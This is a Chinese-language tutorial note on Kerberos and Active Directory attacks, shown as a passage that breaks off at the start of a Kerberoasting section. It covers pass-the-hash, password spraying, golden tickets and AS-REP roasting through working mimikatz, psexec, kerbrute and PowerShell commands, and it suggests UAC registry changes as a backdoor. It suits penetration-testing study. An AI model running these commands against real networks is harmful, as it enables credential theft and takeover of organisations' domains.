前言

在笔者学习完Kerberos之后,对下图每一个知识点对应的攻击方式以及其中的坑进行了总结。在本文中会介绍下面的每一种攻击方法,但因篇幅问题在这里不会详细介绍kerberos的具体协议。请君选取所爱部分进行学习,如文章略有文笔不好的地方,可对比其他师傅的文章即可领悟。

目录

AS-REQ

hash传递攻击(PTH) :哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统。

域外用户枚举:当我们不在域内时,可以通过kerberos中的AS_REQ工作原理来进行枚举域内账号。

密码喷洒攻击(Password Spraying):确定域策略后,设置密码次数使用工具对应的协议爆破密码。

KB22871997补丁与PTH攻击:看了多篇文章,在文章说了有些人认为PTH无法使用sid 500以外的用户登录,是因为打了KB22871997补丁所导致的。但是经过其他师傅的研究,发现并不是。

Pass the Hash with Remote Desktop:当破解不出明文密码时,可以通过Hash这种方式3389登录。

AS-REP

黄金票据:获得域控权限后用来做"万能钥匙"后门
AS-REP Roasting攻击:是一种对"特定设置"用户账号,进行离线爆破的攻击方式。

TGS-REP

SPN:SPN全程 Service Principal Names,是服务器上所运行服务的唯一标识,每个使用kerberos认证的服务都需要一个SPN。
Kerberosast攻击:这种攻击方法主要利用了TGT_REP阶段使用对方NTLM Hash返回的加密数据,通过碰撞加密数据破解用户密码。
白银票据:获取某域账号HASH之后,伪造服务票据ST。通过伪造的TGS,可以直接发送给Server,访问指定的某个服务,来进行攻击。此过程无需KDC。

S4U

非约束委派攻击:拿到非约束委派的主机权限,如能配合打印机BUG。则可以直接拿到域控权限。
约束委派攻击:拿到配置了约束委派的域账户或主机服务账户,就能拿到它委派服务的administrator权限。
基于资源的约束委派攻击:1.如果拿到将主机加入域内的域账号,即使是普通账号也可以拿到那些机器的system权限。 2.“烂番茄”本地提权

PAC

PAC与Kerberos的关系:PAC是特权属性证书,用来向Serber端表明Client的权限。
MS14-068:能够将任意一台域机器提升成域控相关权限

AS-REQ阶段

Hash传递攻击(PTH)

0x00 PTH简介

哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统。 攻击者无须通过解密hash值来获取明文密码。因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击。 攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。

0x01 PTH限制

在03之后有了uac,所以本地只有sid 为500和administrators 组里的域账户能pth。域Domain admin默认在本地管理员组。但是sid 500账户的权限好像会受到限制。当uac某设置为1时,本地管理组内的用户都可以pth,域不变。

修改注册表 改为1

cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

0x02 PTH常用攻击方法

(1) mimikatz 交互式获取
这种方法需要本地管理员权限

privilege::debug
sekurlsa::pth /user:DD /domain:. /ntlm:35c83173a6fb6d142b0359381d5cc84c

(2) psexec
在这里推荐使用impacket套装,有exe和py版本。获取的是system权限

psexec.exe admin@10.73.147.30 -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de
python psexec.py  administrator@10.73.147.29   -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de

(3) wmiexec
获取的是对方hash的权限,如下面为administrator

python wmiexec.py -hashes 624aac413795cdc1a5c7b1e00f780017:08eb9761caca8f3c386962b5ad4b1991 administrator@192.168.20.3

0x03 批量PTH攻击

使用CrackMapExec来进行

https://www.freebuf.com/sectool/184573.html

0x04 PTH所使用的认证协议实验

在看文章时遇到了很有趣的一点,说禁止ntlm认证那么pth就无法使用了。这是错误的

http://blog.sycsec.com/2018/10/02/What-is-Pass-the-Hash-and-the-Limitations-of-mitigation-methods/#pth%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86

在这篇文章中对比的说明了PTH所使用的方法!

https://www.freebuf.com/articles/terminal/80186.html

当我们机器处于域环境中时,如果客户端是以IP地址访问服务端的,那么此使仍旧会使用NTLM协议进行身份认证,因为此时没有提供Server的SPN(server principal name)。

接下来会使用psexec.py来进行演示,因为它有一个-k参数。使用Kerberos身份验证,根据目标参数从文件中获取凭证。如果获取不到则从命令行指定参数中获取!

在这里写着首先会从文件中获取,如果找到了对应了凭证。那么则可能不从参数中获取,导致失败!因此在这里可以先使用命令清除凭证

klist

这时候使用命令去清除凭证

klist purge

之后在使用psexec就可以了,在这里需要注意域名、机器名!

python psexec.py bj.com/administrator@pc1.bj.com -k -hashes 624aac413795cdc1a5c7b1e00f780017:08eb9761caca8f3c386962b5ad4b1991

接下来抓包演示!

实验环境
在这里拿到了域控的NTLM hash

08eb9761caca8f3c386962b5ad4b1991

被攻击机器 192.168.20.3 bj.com\pc1
攻击机 192.168.20. 66 sh\administrator(本地管理登录)
使用工具 psexec.py

在这里执行命令,并开启抓包!

python psexec.py bj.com/administrator@pc1.bj.com -k -hashes 624aac413795cdc1a5c7b1e00f780017:08eb9761caca8f3c386962b5ad4b1991

可以看到这种方式使用的就是kerberos认证!

并且认证成功,我们已经psexec登录了!

那么在这里来对比一下,使用IP登录是否是NTLM认证!

python psexec.py administrator@192.168.20.3 -hashes 624aac413795cdc1a5c7b1e00f780017:08eb9761caca8f3c386962b5ad4b1991

可以从wireshark中详细的看到它是NTLM认证!

因此PTH攻击不管是NTLM认证还是Kerberos认证都是存在的!只是在不同的环境中使用的认证方式不同罢了!

参考链接

刨根问底:Hash传递攻击原理探究
https://www.freebuf.com/articles/terminal/80186.html

域外用户枚举

0x00 原理分析

在域外也能和域进行交互的原因,是利用了kerberos协议认证中的AS-REQ阶段。只要我们能够访问域控88(kerberos服务)端口,就可以通过这种方式去枚举用户名并且进行kerberos协议的暴力破解了!

0x01 攻击优势

相比于LDAP的暴力破解,这里Kerbrute使用的是kerberos pre-auth协议,不会产生大量的日志 (4625 - An account failed to log on)

但是会产生以下日志:

  • 口令验证成功时产生日志 (4768 - A Kerberos authentication ticket (TGT) was requested)
  • 口令验证失败时产生日志 (4771 - Kerberos pre-authentication failed)

0x02 攻击方法

kerbrute_windows_amd64.exe

下载地址:

https://github.com/ropnop/kerbrute/releases

在这里我们需要获取dc的ip,域名。将想要爆破的用户放入user.txt表中,这样就可以获取到了!

kerbrute_windows_amd64.exe userenum --dc 192.168.60.1 -d hacke.testlab user.txt

在我们获取到用户名后,可以将它用来爆破!

kerbrute_windows_amd64.exe passwordspray -d hacke.testlab user.txt QWE123!@#

如果登陆成功,会产生日志(4768 - A kerberos authentication ticket(TGT) was requested):如下图

PY版本 pyKerbrute

下载链接

https://github.com/3gstudent/pyKerbrute

此工具是三好学生师傅写的py版本的枚举爆破工具,相比于kerbrute,多了以下两个攻击!

  • 增加对TCP协议的支持
  • 增加对NTLM hash的验证

此工具分为用户枚举和口令验证两个功能。

1.EnumADUser.py

进行用户枚举,支持TCP和UDP协议。

命令实例:

python2 EnumADUser.py 192.168.60.1 test.com user.txt tcp
python2 EnumADUser.py 192.168.60.1 test.com user.txt udp

2.ADPwdSpray.py

这个脚本进行口令破解功能,支持TCP和UDP协议,支持明文口令和NTLM hash

使用明文密码:

python2 ADPwdSpray.py 192.168.60.1 hacke.testlab user.txt clearpassword QWE123!@# tcp

使用hash:

python2 ADPwdSpray.py 192.168.60.1 hacke.testlab user.txt ntlmhash 35c83173a6fb6d142b0359381d5cc84c udp

参考链接:

https://mp.weixin.qq.com/s/-V1gEpdsUExwU5Fza2YzrA
https://mp.weixin.qq.com/s/vYeR9FDRUfN2ZczmF68vZQ
https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247496592&idx=2&sn=3805d213ba1013e320f48169516c2ca3&chksm=e91523aade62aabc21ebca36a5216f63ec0d4c61e3dd1b4632c10adbb85dfde07e6897897fa5&scene=21#wechat_redirect
https://blog.csdn.net/weixin_41598660/article/details/109152077
https://xz.aliyun.com/t/7724#toc-4
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
http://hackergu.com/ad-information-search-powerview/
https://www.freebuf.com/news/173366.html
https://www.cnblogs.com/mrhonest/p/13372203.html
https://payloads.online/scripts/Invoke-DomainPasswordSpray.txt
https://github.com/dafthack/DomainPasswordSpray
https://blog.csdn.net/qq_36119192/article/details/105088239
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_amd64.exe

密码喷洒攻击(Password Spraying)

0x00 前言

关于密码喷洒,笔者一开始的感觉应该是系统默认开启了次数。但是后来发现这个策略问题需要我们设置才会开启。net accounts /domain 所设置的策略问题,实验环境12默认没有阈值,导致爆破一直不被锁定。

0x01 工具介绍

DomainPasswordSpray.ps1是用PowerShell编写的工具,用于对域用户执行密码喷洒攻击。默认情况下它将利用LDAP从域中导出用户列表,然后扣掉被锁定的用户,再用固定密码进行密码喷洒。

需要使用域权限账户

下载链接:

GitHub项目地址:https://github.com/dafthack/DomainPasswordSpray

在这里作者进行了脚本修改

优化后的地址:http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt

0x02 参数说明

描述:该模块主要用于从域中收集用户列表

参数 功能
Domain 指定要测试的域名
RemoveDisabled 尝试从用户列表删除禁用的账户
RemovePotentialLockouts 删除锁定账户
UserList 自定义用户列表(字典)。如果未指定,将从域中获取
Password 指定单个密码进行口令测试
PasswordList 指定一个密码字典
OutFile 将结果保存到某个文件
Force 当枚举出第一个后继续枚举,不询问

0x03 使用说明

从域中收集用户列表

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\HTWO\Desktop\DomainPasswordSpray.ps1;Get-DomainUserList}"

从域中收集用户列表,包括任何未禁用且未接近锁定状态的账户。它会将结果写入"userlist.txt"文件中

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\HTWO\Desktop\DomainPasswordSpray.ps1; Get-DomainUserList -Domain hacke.testlab -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt }"

从域环境中获取用户名,然后使用密码QWE123!@#进行认证枚举

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\HTWO\Desktop\DomainPasswordSpray.ps1;Invoke-DomainPasswordSpray -Password QWE123!@#}"

从user.txt中提取用户名,与passlist.txt中的密码对照成一对口令,进行域认证枚举,登录成功后会输出到sprayed-creds.txt

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\HTWO\Desktop\DomainPasswordSpray.ps1;Invoke-DomainPasswordSpray -Domain hacke.testlab -Password QWE123!@# -OutFile sprayed-creds.txt}"

参考链接:

https://www.cnblogs.com/mrhonest/p/13372203.html
https://www.chabug.org/tools/411.html
https://www.freebuf.com/news/173366.html
https://mp.weixin.qq.com/s/vYeR9FDRUfN2ZczmF68vZQ

KB22871997补丁与PTH攻击

在这里大部分引用此文章

https://www.freebuf.com/articles/system/220473.html

0x00 前言

看了多篇文章,在文章说了有些人认为PTH无法使用sid 500以外的用户登录,是因为打了KB22871997补丁所导致的。但是经过其他师傅的研究,发现并不是。

0x01 KB2871997安装前后测试

首先看一下未安装补丁的情况,其中本地管理员组有三个帐户,主机名为TESTWIN7,所在域为TEST.LOCAL:

administrator是RID为500的本地管理员账号
testpth是RID非500的本地账号
TEST\xxm为加入了本地Administrators组的域帐户

首先使用本地账户administrator:

使用本地管理组账户testpth:

使用域用户xxm:

这里可以看到:
本地账户administrator成功,本地管理员账户testpth失败,域用户xxm成功。

再来看一下安装补丁之后:

使用本地账户administrator:

使用本地账户testpth:

使用域账户xxm:

在这里可以看到安装KB2871997前后的对比发现并没有任何区别。而之前非administrator的本地管理员Pass The Hash失败被一些观点认为KB2871997的作用,但这实际上因为远程访问和UAC的限制!

0x02 远程访问和UAC

UAC是window Vista的新安全组件,2003版本是没有的。所以2003管理组内的用户还是可以网络登录的,而03之后的win7 win8 win10 2008 2012 2012R2 2016 2019 本地都是只能sid为500的允许网络远程访问!

windows历史

* Windows NT 3.1、3.5、3.51
* Windows NT 4.0
* Windows 2000(Windows NT 5.0)
* Windows XP(Windows NT 5.1)
* Windows Server 2003(Windows NT 5.2)
* Windows Vista(Windows NT 6.0)
* Windows Server 2008(Windows NT 6.0)
* Windows 7(Windows NT 6.1)
* Windows Server 2008 R2(Windows NT 6.1)
* Windows Home Server
* Windows 8(Windows NT 6.2)
* Windows Server 2012(Windows NT 6.2)
* Windows 8.1(Windows NT 6.3)
* Windows Server 2012 R2(Windows NT 6.3)
* Windows 10(开发初期:Windows NT 6.4,现NT 10.0)
* Windows Server 2016 (Windows NT 10)
* Windows Server 2019 (Windows NT 10)

可以在途中看到Windows中administrator的RID为500,并且是唯一的。同样为管理员组的本地账户的testpth的RID的值为1000.

而域账号xxm使用的是域内的SID号

根据微软官方关于远程访问和用户账户控制的相关文档可以了解到,UAC为了更好的保护Administrators组的账户,会在网络上进行限制。

https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows

在使用本地用户进行远程登录时不会使用完全管理员权限,但是在域用户被加入到本地管理组员组后,域用户可以使用完全管理员的AccessToken运行。并且UAC不会生效,简而言之就是除了sid 500的用户之外可以PTH登录之外就是加入本地管理员组的域用户!

(1)完全禁止PTH登录

在注册表中的 FilterAdministratorToken设置为1,路径为:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

修改之后策略会立即生效,administrator的远程连接也被拒绝了

(2)禁用UAC让管理组本地成员登录

这一点可以当作后门,当我们拿下机器后可以把guest加入管理员组并禁用UAC!
官方文档如下:

https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows

可以通过修改注册表中的 LocalAccountTokenFilterPolicy 选项的键值来进行更改。注册表路径为

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

但是这一条一般没有,需要我们去自己设置!将起值修改为1

这样就可以使用本地组管理员登录网络登录了!也就可以PTH了

0x03 KB2871997

此补丁具体更改点如下

  • 支持“ProtectedUsers”组
  • Restricted Admin RDP模式的远程桌面客户端支持
  • 注销后删除LSASS中的凭据
  • 添加两个新的SID
  • LSASS中删除明文凭证

支持“ProtectedUsers”组

对这个组其实挺陌生的,"ProtectedUsers"组是WindowsServer 2012 R2域中的安全组,"ProtectedUsers"组的成员会被强制使用Kerberos身份验证,并且对Kerberos强制执行AES加密!

想要使用mimikatz抓取这个组的hash,需要使用sekurlsa:ekeys

Restricted Admin RDP模式的远程桌面客户端支持

这个模式在打了补丁后才有,是一种变种的PTH能够通过Hash登录3389。在另一篇笔记中做了介绍

注销后删除LSASS中的凭据

在这个更新之前,08什么的只要登陆过lsass内存中就会缓存明文密码、登陆凭证等。但是在打了补丁或者2012 win8 这种机器上只要用户注销就都没了。

添加两个新的SID

在更新后多了两个新的SID:

1、本地账户,LOCAL_ACCOUNT(s-1-5-113),所有本地账户继承此SID
2、本地管理员组,LOCAL_ACCOUNT_AND_MEMBER_OF_ADMINISTRATORS_GROUP(S-1-5-114),所有本地管理员组继承此SID

本来2中的114 id不是这样的介绍,但是在其他文章中写的是管理员组账户。但是在他们实验中在管理员组中的域账号不会继承此SID。

当然了之所以有这两个SID,也是为了方便策略。一下子就可以对本地账户进行区分管理!

如这样拒绝通过远程桌面服务登录

这样设置以后本地管理员组和本地账户都不可以登录了,而域管账户可以登录!

LSASS中删除明文凭证

这里涉及到了Wdigest SSP,在此补丁出世之前。lsass中由各种SSP保存明文密码!但是在补丁出现之后,就只有Wdigest SSP能保存密码了。一开始在这里我还不懂,知道搜索关键字找了以前的笔记!

可以看到之前我所记录的lsass记录明文,修改的就是Wdigest SSP的注册表!当然了,在这里还可以插入其他的SSP去记录明文。在这里只是表达Wdigest SSP的作用!

0x04 防御PTH

  • 将 FilterAdministratorToken的值设置为1,限制administrator账户也不能登录
  • 可以使用脚本或人工定期查看 LocalAccountTokenFilterPolicy 是否有被攻击者修改过
  • 在组策略中的"拒绝从网络访问这台计算机"将需要限制的组、用户加入到列表中!

摘抄链接

https://www.freebuf.com/articles/system/220473.html

Pass the Hash with Remote Desktop

0x00 前言

在一般的渗透测试中,当我们拿到了某个用户的NTLM Hash的时候。我们一般就直接去PTH了,但是除了PTH还有另外一种额外的方法能够让我们PTH登录对方机器的3389服务。但是此条件有些苛刻!

0x01 简介

本文主要介绍以下内容:

  • Restricted Admin mode介绍
  • Pass the Hash with Remote Desktop的适用条件
  • Pass the Hash with Remote Desktop的实现方法

0x02 Restricted Admin mode介绍

官方说明:

https://blogs.technet.microsoft.com/kfalde/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2/

适用系统:

  • 高版本只支持 Windows 8.1和Windows Server 2012 R2
  • 低版本需要打补丁 Windows 7 和Windows Server 2008 R2 默认不支持,需要安装补丁2871997、2973351

在这里形成这个漏洞的主要原因还是因为微软为了避免PTH攻击,开发了2871997补丁导致的!win8 2012 默认包含了这个补丁,所以不需要额外安装。而以前的版本则需要安装下补丁!

相关资料可参考:

https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2871997
https://support.microsoft.com/en-us/help/2973351/microsoft-security-advisory-registry-update-to-improve-credentials-pro

0x03 Pass the Hash with Remote Desktop的实现方法

在这里需要有两个必要的元素!首先是受害者机器需要开启注册表某一项,另一点是攻击机需要使用利用PTH登录的工具!

开启注册表

使用命令开启

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

攻击机登录
(1)使用客户端命令行登录

mstsc.exe /restrictedadmin

如果当前系统不支持Restricted Admin mode,执行后弹出远程桌面的参数说明,如下图

如果系统支持Restricted Admin mode,执行后弹出登录桌面界面,如下图

在这里登录只需要输入对方的IP即可!

(2)使用FreeRDP工具来使用

他的旧版本支持pth登陆方式,下载链接:

https://labs.portcullis.co.uk/download/FreeRDP-pth.tar.gz

在这里笔者没有环境所以没有进行编译测试!

0x04 实际环境测试

如果因为需求一定要登录3389的话,那可以通过这种方式在破解不出明文的情况下登录。

测试环境
Server

  • IP:192.168. 52.129
  • OS:2012 R2
  • Computer Name:WIN-Q2JR4MURGS0
  • User Name : administrator
  • NTLM hash:08eb9761caca8f3c386962b5ad4b1991
  • 未开启Restricted Admin mode

Client:

  • IP:192.168.52.140
  • OS:2012 R2
  • User Name:administrator
  • 支持Restricted Admin mode

(1)psexec pth连接修改注册表

首先获取到B机器本地管理员组用户administrator的NTLM

mimikatz.exe "Log" "Privilege::Debug" "Sekurlsa::logonpasswords" "exit"

获取到的hash如下

08eb9761caca8f3c386962b5ad4b1991

pass:
笔者在这里遇到一个问题,所测试的机器为2012 R2。在administrator账户上增加了DD账户,并添加管理员。想着登录DD账号之后缓存下hash,然后登录administrator再抓hash。但是登录administrator之后一直抓取不到DD的hash,想着以前自己搞得机器都有很多hash啊。

而且不符合登陆过后内存中无hash的思路,这个时候突然想到了一点。打过KB2871997补丁的机器或者2012及以上机器(内置此补丁不需要额外打),注销后会删除凭证。且我实验的机器只有重启、关机、注销三个按钮。

因此一直在administrator上抓不到DD的hash!这点虽然不是很重要,但是这也困扰了我所以记录一下!

然后注入到Client内存中

privilege::debug
kerberos::purge
sekurlsa::pth /user:administrator /domain:. /ntlm:08eb9761caca8f3c386962b5ad4b1991

随后使用psexec连接B机器

PsExec.exe -accepteula \\192.168.52.159 cmd.exe

在命令行中开启注册表必要修改项

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

随后在Client上mimikatz内使用命令登录对方机器,在这里无需账号密码

sekurlsa::pth /user:administrator /domain:. /ntlm:08eb9761caca8f3c386962b5ad4b1991 "/run:mstsc.exe /restrictedadmin"

pass:
如果单独使用mstsc.exe,好像无法指定具体哪个hash登录!

0x05 此模式下带来的问题

在这篇文章中说明了PTH登录3389所带来无法缓存Hash的问题

http://blog.sycsec.com/2018/10/02/What-is-Pass-the-Hash-and-the-Limitations-of-mitigation-methods/#%E8%83%BD%E5%A4%9F%E7%A6%81%E6%AD%A2%E7%94%A8%E6%88%B7%E7%BD%91%E7%BB%9C%E7%99%BB%E5%BD%95

当我们使用pth登录3389进去之后,使用mimikatz抓hash。会发现无法抓取到!

这是因为这是“首先管理员模式”的特性,接下来描述一下为什么会出现这种情况!

1.远程桌面默认使用无约束委派用户凭证,以达到完全在远程服务器上代表用户的目的。当我们连接到远程桌面服务器上,可以使用dir命令链接其他的smb服务器并使用我们登录3389的凭证认证,这是因为客户端进行远程桌面连接的时候会发送用户的明文密码,这个密码可以用于计算HTLM Hash并缓存在远程桌面服务器上!

2.受限管理员模式下,远程桌面客户端会首先使用客户端机器上已缓存的NTLM Hash进行认证,不需要用户输入用户名和密码,也就不会把明文密码委派到目标;即便缓存的hash认证失败,用户必须输入明文密码,mstsc也不会直接发送明文密码,而是计算出所需的值后再发送。这种模式下,登录到远程桌面服务器上并使用dir命令像其他smb服务器认证是,将使用空用户(用户名)登录,几乎都会登录失败!

可以对比看出,客户端直接明文3389登录,可能会被mimikatz从内存中抓取到;而受限管理员模式则能避免发送明文,服务端内存也就不会缓存用户凭证!

参考链接:

https://www.secpulse.com/archives/72190.html
https://www.freebuf.com/articles/system/220473.html
http://blog.sycsec.com/2018/10/02/What-is-Pass-the-Hash-and-the-Limitations-of-mitigation-methods/#%E8%83%BD%E5%A4%9F%E7%A6%81%E6%AD%A2%E7%94%A8%E6%88%B7%E7%BD%91%E7%BB%9C%E7%99%BB%E5%BD%95

AS-REP

黄金票据

0x00 漏洞成因

在kerberos认证笔记中有这么一段话

在TGS_REQ部分,Client将发送大致三种数据。两种加密的,一种不加密的。机密的分别为TGT、Login Session key 加密的时间戳数据B,不加密的如要访问的服务名称

当我们有了trbtgt的密钥之后,我们可以解密TGT,也可以加密TGT。因为我们用了trbtgt NTLM Hash!下面还有这样一段话

当TGS收到请求后,将会检查自身是否存在客户端所请求的服务。如果服务存在,通过krbtgt用户的NTLM hash解密TGT获得Login Session key,使用Login Session key去解密数据B,通过数据B。

这里是关键,TGS获取的Login Session key是通过解开TGT获取的!因此当我们得到trbtgt hash之后,我们就可以伪造任一用户了!

0x01 利用场景

1.拿到域内所有账户Hash,包括krbtgt账户,某些原因导致域控权限掉了,域管改密码了等
2.手上还有一台机器,无所谓是否在域中!
3.域管理员没有更改域控krbtgt账户的密码
4.通常当作后门使用!

0x02 利用条件

伪造黄金凭据需要具备下面条件:

  • krbtgt用户的hash(就意味着你已经有域控制器权限了)
  • 域名称
  • 域的SID值
  • 要伪造的用户名

0x03 实验环境

192.168.60.1 hacke.testlab win2012
192.168.60.55 非域内机器 win2008

使用命令获取hash、SID

mimikatz.exe "Log" "Privilege::Debug" "lsadump::lsa /patch" "exit"

krbtgt NTLM hash

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 30c84f309c52d2d6d05561fc3f904647

域的SID值

S-1-5-21-3502871099-3777307143-1257297015

域名称

hacke.testlab

在这里我们要伪造

Administrator

准备就绪之后就可以在我们的机器上使用了,当前机器权限可以是普通权限。无需管理员即可PTT!

在伪造之前,最好清空一下当前的票据

klist purge

使用mimikatz

kerberos::golden /admin:Administrator /domain:hacke.testlab /sid:S-1-5-21-3502871099-3777307143-1257297015 /krbtgt:30c84f309c52d2d6d05561fc3f904647 /ticket:ticket.kirbi

在成功之后就相当于IPC连接成功之后的攻击方法了!

但是这里不同的工具需要的参数不同,机器名和IP都可以试试看

域控机器名

WIN-Q2JR4MURGS0

WMIEXEC.VBS

cscript wmiexec.vbs /shell 192.168.60.1

psexec

PsExec.exe \\192.168.60.1 cmd.exe

more

AS-REP Roasting攻击

0x00 漏洞成因

这个漏洞是需要额外去配置的! 需要我们在用户账号设置" Do not require Kerberos preauthentication(不需要kerberos预身份验证) "。

在AS_REP阶段,会返回由我们请求的域账户hash加密某个值后返回。然后我们通过自身的ntlm hash去解密得到数据。在这里设置不要求预身份验证后,我们可以在AS_REQ阶段,填写想要伪造请求的用户名,随后会用伪造请求的用户名NTLM Hash加密返回给我们。随后我们就可以拿去爆破了,不过前提就是需要伪造请求的用户名设置了"不要求Kerberos预身份认证"

0x01 实验环境

非域机器,无法通过LDAP来发起用户名的查询。所以即使能够与kerberos通信也没法执行某些脚本。

因此实验在这里分为域内和域外两种!

域内

工具Rebeus

使用命令直接获取域内所有开启"不要求Kerberos域身份认证"的用户,并且返回了他们的加密hash

Rubeus.exe asreproast > log.txt

Empire 中的Powerview.ps1

在这里使用bypass命令直接执行输出到txt中!

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\test.HACKE\Desktop\powerview.ps1;Get-DomainUser -PreauthNotRequired}" > log.txt

获取用户名后,需要获取他们的加密hash。在这里需要使用另外一个模块

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\test.HACKE\Desktop\ASREPRoast.ps1;Get-ASREPHash -UserName test -Domain hacke.testlab | Out-File -Encoding ASCII hash.txt}"

域外

在这里只能通过枚举域用户名操作来获取域用户名,拿到后使用Get-ASREPHash来获取信息!

powershell.exe -exec bypass -Command "& {Import-Module ASREPRoast.ps1;Get-ASREPHash -UserName test -Domain hacke.testlab -Server 192.168.60.1 | Out-File -Encoding ASCII hash.txt}"

工具下载链接

https://github.com/gold1029/ASREPRoast

密码破解

当我们拿到hash之后,就需要去破解了!

如果想要放到hashcat里破解,需要在kerberos后面加上

$23

hashcat -m 18200 hash.txt pass.txt --force

参考链接

http://app.myzaker.com/news/article.php?pk=5d50bec88e9f0929f74cd3da
https://my.oschina.net/u/4583000/blog/4392161
https://www.anquanke.com/post/id/161781

TGS-REP

SPN 扫描

0x00 SPN简介

SPN全程 Service Principal Names,是服务器上所运行服务的唯一标识,每个使用kerberos认证的服务都需要一个SPN。
SPN分为两种,一种注册在AD的机器账户下(Computers)下,另一种注册在域用户账户(Users)下
当一个服务的权限为Local System或Network Service,则SPN注册在机器账户(Computers)下
当一个服务的权限为一个域用户,则SPN注册在域用户账户(Users)下

0x01 SPN扫描作用

SPN扫描能让我们更快的发现在域内运行的服务,并且很难被发现

0x02 SPN格式

serviceclass/host:port/servicename

说明:

  • serviceclass可以理解为服务的名称,常见的有www,ldap,SMTP,DNS,HOST等
  • host有两种形式,FQDN和NetBIOS名,例如server01.test.com和server01
  • 如果服务运行在默认端口上,则端口号(port)可以省略

0x03 查询SPN

对域控制器发起LDAP查询,这是正常kerberos票据行为的一部分,因此查询SPN的操作很难被检测

(1)使用SetSPN

win7和windows server2008 2012自带的功能

查看当前域内的所有SPN:

setspn.exe -q */*

查看具体域内的所有SPN:

setspn.exe -T hacke.testlab -q */*

输出结果实例:

正在检查域 DC=hacke,DC=testlab
CN=WIN-Q2JR4MURGS0,OU=Domain Controllers,DC=hacke,DC=testlab
    Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/WIN-Q2JR4MURGS0.hacke.testlab
    ldap/WIN-Q2JR4MURGS0.hacke.testlab/ForestDnsZones.hacke.testlab
    ldap/WIN-Q2JR4MURGS0.hacke.testlab/DomainDnsZones.hacke.testlab
    DNS/WIN-Q2JR4MURGS0.hacke.testlab
    GC/WIN-Q2JR4MURGS0.hacke.testlab/hacke.testlab
    RestrictedKrbHost/WIN-Q2JR4MURGS0.hacke.testlab
    RestrictedKrbHost/WIN-Q2JR4MURGS0
    RPC/b4794e1c-617b-43eb-9b3a-d20cf4a130dd._msdcs.hacke.testlab
    HOST/WIN-Q2JR4MURGS0/HACKE
    HOST/WIN-Q2JR4MURGS0.hacke.testlab/HACKE
    HOST/WIN-Q2JR4MURGS0
    HOST/WIN-Q2JR4MURGS0.hacke.testlab
    HOST/WIN-Q2JR4MURGS0.hacke.testlab/hacke.testlab
    E3514235-4B06-11D1-AB04-00C04FC2DCD2/b4794e1c-617b-43eb-9b3a-d20cf4a130dd/hacke.testlab
    ldap/WIN-Q2JR4MURGS0/HACKE
    ldap/b4794e1c-617b-43eb-9b3a-d20cf4a130dd._msdcs.hacke.testlab
    ldap/WIN-Q2JR4MURGS0.hacke.testlab/HACKE
    ldap/WIN-Q2JR4MURGS0
    ldap/WIN-Q2JR4MURGS0.hacke.testlab
    ldap/WIN-Q2JR4MURGS0.hacke.testlab/hacke.testlab
CN=krbtgt,CN=Users,DC=hacke,DC=testlab
    kadmin/changepw
CN=WIN7,CN=Computers,DC=hacke,DC=testlab
    RestrictedKrbHost/WIN7
    HOST/WIN7
    RestrictedKrbHost/WIN7.hacke.testlab
    HOST/WIN7.hacke.testlab
CN=WIN8,CN=Computers,DC=hacke,DC=testlab
    RestrictedKrbHost/WIN8
    HOST/WIN8
    RestrictedKrbHost/WIN8.hacke.testlab
    HOST/WIN8.hacke.testlab
发现存在 SPN!

以CN开头的每一行代表一个账户,下面的信息是与之关联的SPN
对于上面的输出数据,机器账户(Computers)为:

CN=WIN-Q2JR4MURGS0,OU=Domain Controllers,DC=hacke,DC=testlab
CN=WIN7,CN=Computers,DC=hacke,DC=testlab
CN=WIN8,CN=Computers,DC=hacke,DC=testlab

域用户账号(Users)为:

CN=krbtgt,CN=Users,DC=hacke,DC=testlab

在我的默认环境下,SPN下只有一个域用户。

0x04 增加SPN域用户

setspn.exe -U -A VNC/WIN7.hacke.testlab test

Kerberosast攻击

0x00 攻击原理

1.kerberos认证过程

这种攻击方法主要利用了TGT_REP阶段使用对方NTLM Hash返回的加密数据,通过碰撞加密数据破解用户密码。

2.Windows系统通过SPN查询获得服务和服务实例帐户的对应关系

但是TGT阶段一开始需要对方是否是否有这个服务,那这个服务怎么发现呢?
这时候可以使用SPN扫描,因为在域中如果服务使用的是kerberos认证。那么就需要在对应域用户下面注册SPN,因此通过SPN扫描可以发现用户对应的服务!

3.域内的任何用户都可以向域内的任何服务请求TGS

